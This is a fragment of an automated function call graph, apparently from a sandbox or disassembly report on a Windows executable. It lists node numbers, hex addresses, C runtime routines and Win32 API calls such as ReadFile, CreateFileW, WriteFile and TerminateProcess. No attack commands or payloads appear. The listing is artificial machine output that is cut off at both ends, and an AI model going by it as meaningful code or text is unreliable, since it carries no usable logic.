__read_nolock 46 API calls 85615->85619 85627 41da3e 85616->85627 85618 417f77 wcstoxl 46 API calls 85617->85618 85621 41da67 85618->85621 85623 41da9d 85619->85623 85620 41db02 85622 417f8a __read_nolock 46 API calls 85620->85622 85624 417f25 wcstoxl 10 API calls 85621->85624 85625 41db07 85622->85625 85626 417f77 wcstoxl 46 API calls 85623->85626 85624->85627 85628 417f77 wcstoxl 46 API calls 85625->85628 85629 41daa4 85626->85629 85627->85578 85628->85629 85633 417f25 wcstoxl 10 API calls 85629->85633 85630->85620 85630->85627 85631 41dae1 85630->85631 85632 41db1b 85630->85632 85631->85620 85639 41daec ReadFile 85631->85639 85635 416b04 __malloc_crt 46 API calls 85632->85635 85633->85627 85636 41db31 85635->85636 85640 41db59 85636->85640 85641 41db3b 85636->85641 85637 41dc17 85638 41df8f GetLastError 85637->85638 85646 41dc2b 85637->85646 85642 41de16 85638->85642 85643 41df9c 85638->85643 85639->85637 85639->85638 85647 420494 __lseeki64_nolock 48 API calls 85640->85647 85645 417f77 wcstoxl 46 API calls 85641->85645 85650 417f9d __dosmaperr 46 API calls 85642->85650 85670 41dd9b 85642->85670 85644 417f77 wcstoxl 46 API calls 85643->85644 85648 41dfa1 85644->85648 85649 41db40 85645->85649 85655 41dc47 85646->85655 85663 41de5b 85646->85663 85646->85670 85651 41db67 85647->85651 85652 417f8a __read_nolock 46 API calls 85648->85652 85653 417f8a __read_nolock 46 API calls 85649->85653 85650->85670 85651->85639 85652->85670 85653->85627 85654 413748 _free 46 API calls 85654->85627 85656 41dcab ReadFile 85655->85656 85662 41dd28 85655->85662 85658 41dcc9 GetLastError 85656->85658 85668 41dcd3 85656->85668 85657 41ded0 ReadFile 85659 41deef GetLastError 85657->85659 85666 41def9 85657->85666 85658->85655 85658->85668 85659->85663 85659->85666 85660 41ddec MultiByteToWideChar 85661 41de10 GetLastError 85660->85661 85660->85670 85661->85642 85664 41dda3 85662->85664 85665 41dd96 85662->85665 85662->85670 85671 41dd60 85662->85671 85663->85657 85663->85670 85664->85671 85672 41ddda 85664->85672 85667 417f77 wcstoxl 46 API calls 85665->85667 85666->85663 85669 420494 __lseeki64_nolock 48 API calls 85666->85669 85667->85670 85668->85655 85673 420494 __lseeki64_nolock 48 API calls 85668->85673 85669->85666 85670->85627 85670->85654 85671->85660 85674 420494 __lseeki64_nolock 48 API calls 85672->85674 85673->85668 85675 41dde9 85674->85675 85675->85660 85676->85559 85677->85582 85678->85561 85679->85577 85680->85582 85681->85569 85682->85577 85683->85579 85684->85578 85685->85582 85687 416b04 __malloc_crt 46 API calls 85686->85687 85688 420618 85687->85688 85688->85589 85689->85586 85690->85594 85694 4148b3 GetSystemTimeAsFileTime __aulldiv 85691->85694 85693 442c6b 85693->85200 85694->85693 85695->85207 85696->85213 85697->85213 85699 45272f __tzset_nolock _wcscpy 85698->85699 85700 414d04 61 API calls __fread_nolock 85699->85700 85701 44afef GetSystemTimeAsFileTime 85699->85701 85702 4528a4 85699->85702 85703 4150d1 81 API calls _fseek 85699->85703 85700->85699 85701->85699 85702->85122 85702->85123 85703->85699 85705 44b1bc 85704->85705 85706 44b1ca 85704->85706 85707 4149c2 116 API calls 85705->85707 85708 44b1e1 85706->85708 85709 44b1d8 85706->85709 85710 4149c2 116 API calls 85706->85710 85707->85706 85739 4321a4 85708->85739 85709->85149 85712 44b2db 85710->85712 85712->85708 85714 44b2e9 85712->85714 85713 44b224 85715 44b253 85713->85715 85716 44b228 85713->85716 85717 44b2f6 85714->85717 85719 414a46 __fcloseall 82 API calls 85714->85719 85743 43213d 85715->85743 85718 44b235 85716->85718 85722 414a46 __fcloseall 82 API calls 85716->85722 85717->85149 85723 44b245 85718->85723 85726 414a46 __fcloseall 82 API calls 85718->85726 85719->85717 85721 44b25a 85724 44b260 85721->85724 85725 44b289 85721->85725 85722->85718 85723->85149 85728 414a46 __fcloseall 82 API calls 85724->85728 85730 44b26d 85724->85730 85753 44b0bf 87 API calls 85725->85753 85726->85723 85728->85730 85729 44b28f 85754 4320f8 46 API calls _free 85729->85754 85731 414a46 __fcloseall 82 API calls 85730->85731 85733 44b27d 85730->85733 85731->85733 85733->85149 85734 44b295 85735 44b2a2 85734->85735 85736 414a46 __fcloseall 82 API calls 85734->85736 85737 44b2b2 85735->85737 85738 414a46 __fcloseall 82 API calls 85735->85738 85736->85735 85737->85149 85738->85737 85740 4321cb 85739->85740 85742 4321b4 __tzset_nolock _memmove 85739->85742 85741 414d04 __fread_nolock 61 API calls 85740->85741 85741->85742 85742->85713 85744 4135bb _malloc 46 API calls 85743->85744 85745 432150 85744->85745 85746 4135bb _malloc 46 API calls 85745->85746 85747 432162 85746->85747 85748 4135bb _malloc 46 API calls 85747->85748 85749 432174 85748->85749 85752 432189 85749->85752 85755 4320f8 46 API calls _free 85749->85755 85751 432198 85751->85721 85752->85721 85753->85729 85754->85734 85755->85751 85756->85052 85757->85053 85758->85072 85759->85072 85760->85072 85761->85066 85762->85072 85763->85072 85764->85077 85765->85086 85766->85087 85767->85087 85817 410160 85768->85817 85770 41012f GetFullPathNameW 85771 410147 moneypunct 85770->85771 85771->84908 85773 4102cb SHGetDesktopFolder 85772->85773 85776 410333 _wcsncpy 85772->85776 85774 4102e0 _wcsncpy 85773->85774 85773->85776 85775 41031c SHGetPathFromIDListW 85774->85775 85774->85776 85775->85776 85776->84911 85778 4101bb 85777->85778 85782 425f4a 85777->85782 85779 410160 52 API calls 85778->85779 85780 4101c7 85779->85780 85821 410200 52 API calls 2 library calls 85780->85821 85781 4114ab __wcsicoll 58 API calls 85781->85782 85782->85781 85784 425f6e 85782->85784 85784->84913 85785 4101d6 85822 410200 52 API calls 2 library calls 85785->85822 85787 4101e9 85787->84913 85789 40f760 126 API calls 85788->85789 85790 40f584 85789->85790 85791 429335 85790->85791 85792 40f58c 85790->85792 85795 4528bd 118 API calls 85791->85795 85793 40f598 85792->85793 85794 429358 85792->85794 85847 4033c0 113 API calls 7 library calls 85793->85847 85848 434034 86 API calls _wprintf 85794->85848 85796 42934b 85795->85796 85799 429373 85796->85799 85800 42934f 85796->85800 85804 4115d7 52 API calls 85799->85804 85803 431e58 82 API calls 85800->85803 85801 429369 85801->85799 85802 40f5b4 85802->84909 85803->85794 85816 4293c5 moneypunct 85804->85816 85805 42959c 85806 413748 _free 46 API calls 85805->85806 85807 4295a5 85806->85807 85808 431e58 82 API calls 85807->85808 85809 4295b1 85808->85809 85813 401b10 52 API calls 85813->85816 85816->85805 85816->85813 85823 444af8 85816->85823 85826 44b41c 85816->85826 85833 402780 85816->85833 85841 4022d0 85816->85841 85849 44c7dd 64 API calls 3 library calls 85816->85849 85818 410167 _wcslen 85817->85818 85819 4115d7 52 API calls 85818->85819 85820 41017e _wcscpy 85819->85820 85820->85770 85821->85785 85822->85787 85824 4115d7 52 API calls 85823->85824 85825 444b27 _memmove 85824->85825 85825->85816 85827 44b429 85826->85827 85828 4115d7 52 API calls 85827->85828 85829 44b440 85828->85829 85830 44b45e 85829->85830 85831 401b10 52 API calls 85829->85831 85830->85816 85832 44b453 85831->85832 85832->85816 85834 402827 85833->85834 85840 402790 moneypunct _memmove 85833->85840 85836 4115d7 52 API calls 85834->85836 85835 4115d7 52 API calls 85837 402797 85835->85837 85836->85840 85838 4115d7 52 API calls 85837->85838 85839 4027bd 85837->85839 85838->85839 85839->85816 85840->85835 85842 4022e0 85841->85842 85844 40239d 85841->85844 85843 4115d7 52 API calls 85842->85843 85842->85844 85846 402320 moneypunct 85842->85846 85843->85846 85844->85816 85845 4115d7 52 API calls 85845->85846 85846->85844 85846->85845 85847->85802 85848->85801 85849->85816 85851 402417 85850->85851 85852 402539 moneypunct 85850->85852 85851->85852 85853 4115d7 52 API calls 85851->85853 85852->84917 85854 402443 85853->85854 85855 4115d7 52 API calls 85854->85855 85856 4024b4 85855->85856 85856->85852 85858 4022d0 52 API calls 85856->85858 85879 402880 95 API calls 2 library calls 85856->85879 85858->85856 85863 401566 85859->85863 85860 401794 85880 40e9a0 90 API calls 85860->85880 85862 40167a 85866 4017c0 85862->85866 85881 45e737 90 API calls 3 library calls 85862->85881 85863->85860 85863->85862 85865 4010a0 52 API calls 85863->85865 85865->85863 85866->84919 85868 40bc70 52 API calls 85867->85868 85877 40d451 85868->85877 85869 40d50f 85884 410600 52 API calls 85869->85884 85871 427c01 85885 45e737 90 API calls 3 library calls 85871->85885 85872 40e0a0 52 API calls 85872->85877 85874 40d519 85874->84922 85875 401b10 52 API calls 85875->85877 85877->85869 85877->85871 85877->85872 85877->85874 85877->85875 85882 40f310 53 API calls 85877->85882 85883 40d860 91 API calls 85877->85883 85879->85856 85880->85862 85881->85866 85882->85877 85883->85877 85884->85874 85885->85874 85886->84935 85887->84936 85889 4091c6 85888->85889 85890 42c5fe 85888->85890 85889->84999 85890->85889 85891 40bc70 52 API calls 85890->85891 85892 42c64e InterlockedIncrement 85891->85892 85893 42c665 85892->85893 85899 42c697 85892->85899 85895 42c672 InterlockedDecrement Sleep InterlockedIncrement 85893->85895 85893->85899 85894 42c737 InterlockedDecrement 85896 42c74a 85894->85896 85895->85893 85895->85899 85898 408f40 VariantClear 85896->85898 85897 42c731 85897->85894 85900 42c752 85898->85900 85899->85894 85899->85897 86172 408e80 85899->86172 86181 410c60 VariantClear moneypunct 85900->86181 85905 42c6db 85906 402160 52 API calls 85905->85906 85907 42c6e5 85906->85907 86177 45340c 85 API calls 85907->86177 85909 42c6f1 86178 40d200 52 API calls 2 library calls 85909->86178 85911 42c6fb 86179 465124 53 API calls 85911->86179 85913 42c715 85914 42c76a 85913->85914 85915 42c719 85913->85915 85916 401b10 52 API calls 85914->85916 86180 46fe32 VariantClear 85915->86180 85918 42c77e 85916->85918 85919 401980 53 API calls 85918->85919 85925 42c796 85919->85925 85920 42c812 86183 46fe32 VariantClear 85920->86183 85922 42c82a InterlockedDecrement 86184 46ff07 54 API calls 85922->86184 85924 42c864 86185 45e737 90 API calls 3 library calls 85924->86185 85925->85920 85925->85924 86182 40ba10 52 API calls 2 library calls 85925->86182 85926 42c9ec 86228 47d33e 331 API calls 85926->86228 85930 42c9fe 86229 46feb1 VariantClear VariantClear 85930->86229 85932 408f40 VariantClear 85942 42c849 85932->85942 85933 42ca08 85934 401b10 52 API calls 85933->85934 85936 42ca15 85934->85936 85935 408f40 VariantClear 85937 42c891 85935->85937 85939 40c2c0 52 API calls 85936->85939 86186 410c60 VariantClear moneypunct 85937->86186 85938 401980 53 API calls 85938->85942 85943 42c874 85939->85943 85941 402780 52 API calls 85941->85942 85942->85926 85942->85932 85942->85938 85942->85941 86187 40a780 85942->86187 85943->85935 85945 42ca59 85943->85945 85945->85945 85947 40afc4 85946->85947 85948 40b156 85946->85948 85949 40afd5 85947->85949 85950 42d1e3 85947->85950 86239 45e737 90 API calls 3 library calls 85948->86239 85953 40a780 194 API calls 85949->85953 85969 40b11a moneypunct 85949->85969 86240 45e737 90 API calls 3 library calls 85950->86240 85956 40b00a 85953->85956 85954 42d1f8 85959 408f40 VariantClear 85954->85959 85955 40b143 85955->84999 85956->85954 85960 40b012 85956->85960 85958 42d4db 85958->85958 85959->85955 85961 40b04a 85960->85961 85962 40b094 moneypunct 85960->85962 85963 42d231 VariantClear 85960->85963 85971 40b05c moneypunct 85961->85971 86241 40e270 VariantClear moneypunct 85961->86241 85964 40b108 85962->85964 85966 42d425 moneypunct 85962->85966 85963->85971 85964->85969 86242 40e270 VariantClear moneypunct 85964->86242 85965 42d45a VariantClear 85965->85969 85966->85965 85966->85969 85968 4115d7 52 API calls 85968->85962 85969->85955 86243 45e737 90 API calls 3 library calls 85969->86243 85971->85962 85971->85968 85973 408fff 85972->85973 85984 40900d 85972->85984 86244 403ea0 52 API calls __cinit 85973->86244 85976 42c3f6 86247 45e737 90 API calls 3 library calls 85976->86247 85978 42c44a 86249 45e737 90 API calls 3 library calls 85978->86249 85979 40a780 194 API calls 85979->85984 85980 42c47b 86250 451b42 61 API calls 85980->86250 85984->85976 85984->85978 85984->85979 85984->85980 85985 42c4cb 85984->85985 85986 42c564 85984->85986 85987 42c548 85984->85987 85991 409112 85984->85991 85994 4090df 85984->85994 85996 42c528 85984->85996 85998 4090ea 85984->85998 86006 4090f2 moneypunct 85984->86006 86246 4534e3 52 API calls 85984->86246 86248 40c4e0 194 API calls 85984->86248 86252 47faae 233 API calls 85985->86252 85988 408f40 VariantClear 85986->85988 86255 45e737 90 API calls 3 library calls 85987->86255 85988->86006 85989 42c491 85989->86006 86251 45e737 90 API calls 3 library calls 85989->86251 85991->85987 86001 40912b 85991->86001 85992 42c4da 85992->86006 86253 45e737 90 API calls 3 library calls 85992->86253 85994->85998 85999 408e80 VariantClear 85994->85999 86254 45e737 90 API calls 3 library calls 85996->86254 86002 408f40 VariantClear 85998->86002 85999->85998 86001->86006 86245 403e10 53 API calls 86001->86245 86002->86006 86004 40914b 86005 408f40 VariantClear 86004->86005 86005->86006 86006->84999 86256 408d90 86007->86256 86009 429778 86285 410c60 VariantClear moneypunct 86009->86285 86011 429780 86012 408cf9 86012->86009 86013 42976c 86012->86013 86015 408d2d 86012->86015 86284 45e737 90 API calls 3 library calls 86013->86284 86272 403d10 86015->86272 86018 408d45 moneypunct 86019 408d71 moneypunct 86018->86019 86020 408f40 VariantClear 86018->86020 86019->84999 86020->86018 86022 4096c6 _wcslen 86021->86022 86023 4115d7 52 API calls 86022->86023 86085 40a70c moneypunct _memmove 86022->86085 86024 4096fa _memmove 86023->86024 86026 4115d7 52 API calls 86024->86026 86025 4013a0 52 API calls 86027 4297aa 86025->86027 86028 40971b 86026->86028 86029 4115d7 52 API calls 86027->86029 86030 409749 CharUpperBuffW 86028->86030 86032 40976a moneypunct 86028->86032 86028->86085 86073 4297d1 _memmove 86029->86073 86030->86032 86082 4097e5 moneypunct 86032->86082 86565 47dcbb 196 API calls 86032->86565 86034 42a452 86035 408f40 VariantClear 86034->86035 86036 42ae92 86035->86036 86592 410c60 VariantClear moneypunct 86036->86592 86038 42aea4 86039 409aa2 86041 4115d7 52 API calls 86039->86041 86046 409afe 86039->86046 86039->86073 86040 40a689 86043 4115d7 52 API calls 86040->86043 86041->86046 86042 4115d7 52 API calls 86042->86082 86060 40a6af moneypunct _memmove 86043->86060 86044 409b2a 86048 429dbe 86044->86048 86108 409b4d moneypunct _memmove 86044->86108 86573 40b400 VariantClear VariantClear moneypunct 86044->86573 86045 40c2c0 52 API calls 86045->86082 86046->86044 86047 4115d7 52 API calls 86046->86047 86049 429d31 86047->86049 86053 429dd3 86048->86053 86574 40b400 VariantClear VariantClear moneypunct 86048->86574 86052 429d42 86049->86052 86570 44a801 52 API calls 86049->86570 86050 409fd2 86058 40a045 86050->86058 86109 42a3f5 86050->86109 86064 40e0a0 52 API calls 86052->86064 86053->86108 86575 40e1c0 VariantClear moneypunct 86053->86575 86054 429a46 VariantClear 86054->86082 86055 408f40 VariantClear 86055->86082 86062 4115d7 52 API calls 86058->86062 86068 4115d7 52 API calls 86060->86068 86069 40a04c 86062->86069 86070 429d57 86064->86070 86066 42a42f 86579 45e737 90 API calls 3 library calls 86066->86579 86068->86085 86071 40a0a7 86069->86071 86075 4091e0 317 API calls 86069->86075 86571 453443 52 API calls 86070->86571 86093 40a0af 86071->86093 86580 40c790 VariantClear moneypunct 86071->86580 86072 4299d9 86076 408f40 VariantClear 86072->86076 86591 45e737 90 API calls 3 library calls 86073->86591 86075->86071 86081 4299e2 86076->86081 86077 429abd 86077->84999 86078 429d88 86572 453443 52 API calls 86078->86572 86567 410c60 VariantClear moneypunct 86081->86567 86082->86034 86082->86039 86082->86040 86082->86042 86082->86045 86082->86054 86082->86055 86082->86060 86082->86072 86082->86073 86082->86077 86087 40a780 194 API calls 86082->86087 86566 40c4e0 194 API calls 86082->86566 86568 40ba10 52 API calls 2 library calls 86082->86568 86569 40e270 VariantClear moneypunct 86082->86569 86085->86025 86087->86082 86088 402780 52 API calls 86088->86108 86089 4115d7 52 API calls 86089->86108 86091 44a801 52 API calls 86091->86108 86092 408f40 VariantClear 86122 40a162 moneypunct _memmove 86092->86122 86094 40a11b 86093->86094 86095 42a4b4 VariantClear 86093->86095 86093->86122 86101 40a12d moneypunct 86094->86101 86581 40e270 VariantClear moneypunct 86094->86581 86095->86101 86096 40a780 194 API calls 86096->86108 86098 401980 53 API calls 86098->86108 86099 408e80 VariantClear 86099->86108 86100 4115d7 52 API calls 86100->86122 86101->86100 86101->86122 86102 408e80 VariantClear 86102->86122 86104 42a74d VariantClear 86104->86122 86105 41130a 51 API calls __cinit 86105->86108 86106 40a368 86107 42aad4 86106->86107 86116 40a397 86106->86116 86584 46fe90 VariantClear VariantClear moneypunct 86107->86584 86108->86050 86108->86066 86108->86085 86108->86088 86108->86089 86108->86091 86108->86096 86108->86098 86108->86099 86108->86105 86108->86109 86112 409c95 86108->86112 86576 45f508 52 API calls 86108->86576 86577 403e10 53 API calls 86108->86577 86578 47390f VariantClear 86109->86578 86110 42a886 VariantClear 86110->86122 86111 42a7e4 VariantClear 86111->86122 86112->84999 86113 40a3ce 86127 40a3d9 moneypunct 86113->86127 86585 40b400 VariantClear VariantClear moneypunct 86113->86585 86115 40e270 VariantClear 86115->86122 86116->86113 86140 40a42c moneypunct 86116->86140 86564 40b400 VariantClear VariantClear moneypunct 86116->86564 86119 4115d7 52 API calls 86119->86122 86120 42abaf 86124 42abd4 VariantClear 86120->86124 86133 40a4ee moneypunct 86120->86133 86121 4115d7 52 API calls 86125 42a5a6 VariantInit VariantCopy 86121->86125 86122->86092 86122->86102 86122->86104 86122->86106 86122->86107 86122->86110 86122->86111 86122->86115 86122->86119 86122->86121 86582 470870 52 API calls 86122->86582 86583 44ccf1 VariantClear moneypunct 86122->86583 86123 40a4dc 86123->86133 86587 40e270 VariantClear moneypunct 86123->86587 86124->86133 86125->86122 86129 42a5c6 VariantClear 86125->86129 86128 40a41a 86127->86128 86131 42ab44 VariantClear 86127->86131 86127->86140 86128->86140 86586 40e270 VariantClear moneypunct 86128->86586 86129->86122 86130 42ac4f 86135 42ac79 VariantClear 86130->86135 86138 40a546 moneypunct 86130->86138 86131->86140 86133->86130 86134 40a534 86133->86134 86134->86138 86588 40e270 VariantClear moneypunct 86134->86588 86135->86138 86136 42ad28 86142 42ad4e VariantClear 86136->86142 86147 40a583 moneypunct 86136->86147 86138->86136 86139 40a571 86138->86139 86139->86147 86589 40e270 VariantClear moneypunct 86139->86589 86140->86120 86140->86123 86142->86147 86144 40a650 moneypunct 86144->84999 86145 42ae0e VariantClear 86145->86147 86147->86144 86147->86145 86590 40e270 VariantClear moneypunct 86147->86590 86148->84999 86149->84999 86150->84999 86151->84946 86152->84952 86153->84999 86154->84999 86155->84999 86156->84999 86157->84996 86158->84996 86159->84996 86160->84996 86161->84996 86162->84996 86163->84996 86165 403cdf 86164->86165 86166 408f40 VariantClear 86165->86166 86167 403ce7 86166->86167 86167->84990 86168->84996 86169->84996 86170->84999 86171->84943 86173 408e88 86172->86173 86175 408e94 86172->86175 86174 408f40 VariantClear 86173->86174 86174->86175 86176 45340c 85 API calls 86175->86176 86176->85905 86177->85909 86178->85911 86179->85913 86180->85897 86181->85889 86182->85925 86183->85922 86184->85942 86185->85943 86186->85889 86188 40a7a6 86187->86188 86189 40ae8c 86187->86189 86191 4115d7 52 API calls 86188->86191 86230 41130a 51 API calls __cinit 86189->86230 86210 40a7c6 moneypunct _memmove 86191->86210 86192 40a86d 86194 40abd1 86192->86194 86213 40a878 moneypunct 86192->86213 86193 408e80 VariantClear 86193->86210 86235 45e737 90 API calls 3 library calls 86194->86235 86195 4115d7 52 API calls 86195->86210 86197 40bc10 53 API calls 86197->86210 86198 401b10 52 API calls 86198->86210 86199 42b791 VariantClear 86199->86210 86200 40b5f0 89 API calls 86200->86210 86201 42ba2d VariantClear 86201->86210 86202 408f40 VariantClear 86202->86213 86203 42b459 VariantClear 86203->86210 86204 40a884 moneypunct 86204->85942 86206 408cc0 187 API calls 86206->86210 86207 42b6f6 VariantClear 86207->86210 86208 4530c9 VariantClear 86208->86210 86209 42bc5b 86209->85942 86210->86192 86210->86193 86210->86194 86210->86195 86210->86197 86210->86198 86210->86199 86210->86200 86210->86201 86210->86203 86210->86206 86210->86207 86210->86208 86211 42bbf5 86210->86211 86212 42bb6a 86210->86212 86214 40e270 VariantClear 86210->86214 86215 4115d7 52 API calls 86210->86215 86219 408f40 VariantClear 86210->86219 86223 42bc37 86210->86223 86231 45308a 53 API calls 86210->86231 86232 470870 52 API calls 86210->86232 86233 457f66 87 API calls __write_nolock 86210->86233 86234 472f47 127 API calls 86210->86234 86236 45e737 90 API calls 3 library calls 86211->86236 86238 44b92d VariantClear 86212->86238 86213->86202 86213->86204 86214->86210 86217 42b5b3 VariantInit VariantCopy 86215->86217 86217->86210 86220 42b5d7 VariantClear 86217->86220 86219->86210 86220->86210 86237 45e737 90 API calls 3 library calls 86223->86237 86226 42bc48 86226->86212 86227 408f40 VariantClear 86226->86227 86227->86212 86228->85930 86229->85933 86230->86210 86231->86210 86232->86210 86233->86210 86234->86210 86235->86212 86236->86212 86237->86226 86238->86209 86239->85950 86240->85954 86241->85971 86242->85969 86243->85958 86244->85984 86245->86004 86246->85984 86247->86006 86248->85984 86249->86006 86250->85989 86251->86006 86252->85992 86253->86006 86254->86006 86255->85986 86257 4289d2 86256->86257 86258 408db3 86256->86258 86288 45e737 90 API calls 3 library calls 86257->86288 86286 40bec0 90 API calls 86258->86286 86261 4289e5 86289 45e737 90 API calls 3 library calls 86261->86289 86263 428a05 86265 408f40 VariantClear 86263->86265 86271 408e5a 86265->86271 86266 40a780 194 API calls 86267 408dc9 86266->86267 86267->86261 86267->86263 86267->86266 86268 408e64 86267->86268 86270 408f40 VariantClear 86267->86270 86267->86271 86287 40ba10 52 API calls 2 library calls 86267->86287 86269 408f40 VariantClear 86268->86269 86269->86271 86270->86267 86271->86012 86273 408f40 VariantClear 86272->86273 86274 403d20 86273->86274 86275 403cd0 VariantClear 86274->86275 86276 403d4d 86275->86276 86279 4013c0 52 API calls 86276->86279 86290 46e91c 86276->86290 86293 467897 86276->86293 86337 45e17d 86276->86337 86347 40de10 86276->86347 86352 4755ad 86276->86352 86277 403d76 86277->86009 86277->86018 86279->86277 86284->86009 86285->86011 86286->86267 86287->86267 86288->86261 86289->86263 86355 46e785 86290->86355 86292 46e92f 86292->86277 86294 4678bb 86293->86294 86326 467954 86294->86326 86457 45340c 85 API calls 86294->86457 86295 4115d7 52 API calls 86296 467989 86295->86296 86298 467995 86296->86298 86461 40da60 53 API calls 86296->86461 86302 4533eb 85 API calls 86298->86302 86299 4678f6 86301 413a0e __wsplitpath 46 API calls 86299->86301 86303 4678fc 86301->86303 86304 4679b7 86302->86304 86305 401b10 52 API calls 86303->86305 86306 40de40 60 API calls 86304->86306 86307 46790c 86305->86307 86308 4679c3 86306->86308 86458 40d200 52 API calls 2 library calls 86307->86458 86310 4679c7 GetLastError 86308->86310 86311 467a05 86308->86311 86313 403cd0 VariantClear 86310->86313 86315 467a2c 86311->86315 86316 467a4b 86311->86316 86312 467917 86312->86326 86459 4339fa GetFileAttributesW FindFirstFileW FindClose 86312->86459 86317 4679dc 86313->86317 86321 4115d7 52 API calls 86315->86321 86318 4115d7 52 API calls 86316->86318 86319 4679e6 86317->86319 86323 44ae3e CloseHandle 86317->86323 86322 467a49 86318->86322 86325 408f40 VariantClear 86319->86325 86320 467928 86324 46792f 86320->86324 86320->86326 86328 467a31 86321->86328 86332 408f40 VariantClear 86322->86332 86323->86319 86460 4335cd 56 API calls 3 library calls 86324->86460 86330 4679ed 86325->86330 86326->86295 86327 467964 86326->86327 86327->86277 86462 436299 52 API calls 2 library calls 86328->86462 86330->86277 86334 467a88 86332->86334 86333 467939 86333->86326 86335 408f40 VariantClear 86333->86335 86334->86277 86336 467947 86335->86336 86336->86326 86338 45e198 86337->86338 86339 45e19c 86338->86339 86340 45e1b8 86338->86340 86341 408f40 VariantClear 86339->86341 86342 45e1cc 86340->86342 86343 45e1db FindClose 86340->86343 86344 45e1a4 86341->86344 86345 45e1d9 moneypunct 86342->86345 86346 44ae3e CloseHandle 86342->86346 86343->86345 86344->86277 86345->86277 86346->86345 86348 4115d7 52 API calls 86347->86348 86349 40de23 86348->86349 86350 40da20 CloseHandle 86349->86350 86351 40de2e 86350->86351 86351->86277 86463 475077 86352->86463 86354 4755c0 86354->86277 86356 46e7a2 86355->86356 86357 4115d7 52 API calls 86356->86357 86360 46e802 86356->86360 86358 46e7ad 86357->86358 86359 46e7b9 86358->86359 86403 40da60 53 API calls 86358->86403 86404 4533eb 86359->86404 86361 46e7e5 86360->86361 86368 46e82f 86360->86368 86362 408f40 VariantClear 86361->86362 86365 46e7ea 86362->86365 86365->86292 86367 46e8b5 86396 4680ed 86367->86396 86368->86367 86370 46e845 86368->86370 86373 4533eb 85 API calls 86370->86373 86383 46e84b 86373->86383 86374 46e7db 86374->86361 86420 44ae3e 86374->86420 86375 46e8bb 86400 443fbe 86375->86400 86376 46e87a 86423 4689f4 59 API calls 86376->86423 86379 46e883 86382 4013c0 52 API calls 86379->86382 86384 46e88f 86382->86384 86383->86376 86383->86379 86386 40e0a0 52 API calls 86384->86386 86385 408f40 VariantClear 86394 46e881 86385->86394 86387 46e899 86386->86387 86424 40d200 52 API calls 2 library calls 86387->86424 86389 46e911 86389->86292 86390 46e8a5 86425 4689f4 59 API calls 86390->86425 86393 46e903 86395 44ae3e CloseHandle 86393->86395 86394->86389 86426 40da20 86394->86426 86395->86389 86397 468100 86396->86397 86398 4680fa 86396->86398 86397->86375 86430 467ac4 55 API calls 2 library calls 86398->86430 86431 443e36 86400->86431 86402 443fd3 86402->86385 86402->86394 86403->86359 86405 453404 86404->86405 86406 4533f8 86404->86406 86408 40de40 86405->86408 86406->86405 86438 4531b1 85 API calls 5 library calls 86406->86438 86409 40da20 CloseHandle 86408->86409 86410 40de4e 86409->86410 86439 40f110 86410->86439 86413 4264fa 86415 40de84 86448 40e080 SetFilePointerEx SetFilePointerEx 86415->86448 86417 40de8b 86449 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86417->86449 86419 40de90 86419->86368 86419->86374 86421 44ae4b moneypunct 86420->86421 86451 443fdf 86420->86451 86421->86361 86423->86394 86424->86390 86425->86394 86427 40da37 86426->86427 86428 40da29 86426->86428 86427->86428 86429 40da3c CloseHandle 86427->86429 86428->86393 86429->86393 86430->86397 86434 443e19 86431->86434 86435 443e26 86434->86435 86436 443e32 WriteFile 86434->86436 86437 443db4 SetFilePointerEx SetFilePointerEx 86435->86437 86436->86402 86437->86436 86438->86405 86440 40f125 CreateFileW 86439->86440 86441 42630c 86439->86441 86442 40de74 86440->86442 86441->86442 86443 426311 CreateFileW 86441->86443 86442->86413 86447 40dea0 55 API calls moneypunct 86442->86447 86443->86442 86444 426337 86443->86444 86450 40df90 SetFilePointerEx SetFilePointerEx 86444->86450 86446 426342 86446->86442 86447->86415 86448->86417 86449->86419 86450->86446 86452 40da20 CloseHandle 86451->86452 86453 443feb 86452->86453 86456 4340db CloseHandle moneypunct 86453->86456 86455 444001 86455->86421 86456->86455 86457->86299 86458->86312 86459->86320 86460->86333 86461->86298 86462->86322 86464 4533eb 85 API calls 86463->86464 86465 4750b8 86464->86465 86466 4750ee 86465->86466 86467 475129 86465->86467 86469 408f40 VariantClear 86466->86469 86516 4646e0 86467->86516 86474 4750f5 86469->86474 86470 47515e 86471 475162 86470->86471 86509 47518e 86470->86509 86472 408f40 VariantClear 86471->86472 86503 475169 86472->86503 86473 475357 86475 475365 86473->86475 86476 4754ea 86473->86476 86474->86354 86550 44b3ac 57 API calls 86475->86550 86556 464812 92 API calls 86476->86556 86480 4754fc 86481 475374 86480->86481 86483 475508 86480->86483 86529 430d31 86481->86529 86482 4533eb 85 API calls 86482->86509 86484 408f40 VariantClear 86483->86484 86487 47550f 86484->86487 86487->86503 86488 475388 86536 4577e9 86488->86536 86490 47539e 86544 410cfc 86490->86544 86491 475480 86493 408f40 VariantClear 86491->86493 86493->86503 86495 4753d4 86552 40e830 53 API calls 86495->86552 86496 4753b8 86551 45e737 90 API calls 3 library calls 86496->86551 86499 4753c5 GetCurrentProcess TerminateProcess 86499->86495 86500 4753e3 86514 475406 86500->86514 86553 40cf00 53 API calls 86500->86553 86501 4754b5 86502 408f40 VariantClear 86501->86502 86502->86503 86503->86354 86505 475556 86505->86503 86509->86473 86509->86482 86509->86491 86509->86501 86509->86509 86548 436299 52 API calls 2 library calls 86509->86548 86549 463ad5 64 API calls __wcsicoll 86509->86549 86512 408e80 VariantClear 86512->86514 86514->86505 86514->86512 86515 408f40 VariantClear 86514->86515 86555 40cf00 53 API calls 86514->86555 86515->86514 86559 4536f7 53 API calls 86516->86559 86518 4646fc 86560 4426cd 59 API calls _wcslen 86518->86560 86520 464711 86522 40bc70 52 API calls 86520->86522 86528 46474b 86520->86528 86523 46472c 86522->86523 86561 461465 52 API calls _memmove 86523->86561 86525 464741 86526 40c600 52 API calls 86525->86526 86526->86528 86527 464793 86527->86470 86528->86527 86562 463ad5 64 API calls __wcsicoll 86528->86562 86530 430db2 86529->86530 86531 430d54 86529->86531 86530->86488 86532 4115d7 52 API calls 86531->86532 86535 430d74 86532->86535 86533 430da9 86533->86488 86534 4115d7 52 API calls 86534->86535 86535->86533 86535->86534 86537 457a84 86536->86537 86543 45780c _strcat moneypunct _wcslen _wcscpy 86536->86543 86537->86490 86538 45340c 85 API calls 86538->86543 86539 443006 57 API calls 86539->86543 86541 4135bb 46 API calls _malloc 86541->86543 86542 40f6f0 54 API calls 86542->86543 86543->86537 86543->86538 86543->86539 86543->86541 86543->86542 86563 44b3ac 57 API calls 86543->86563 86546 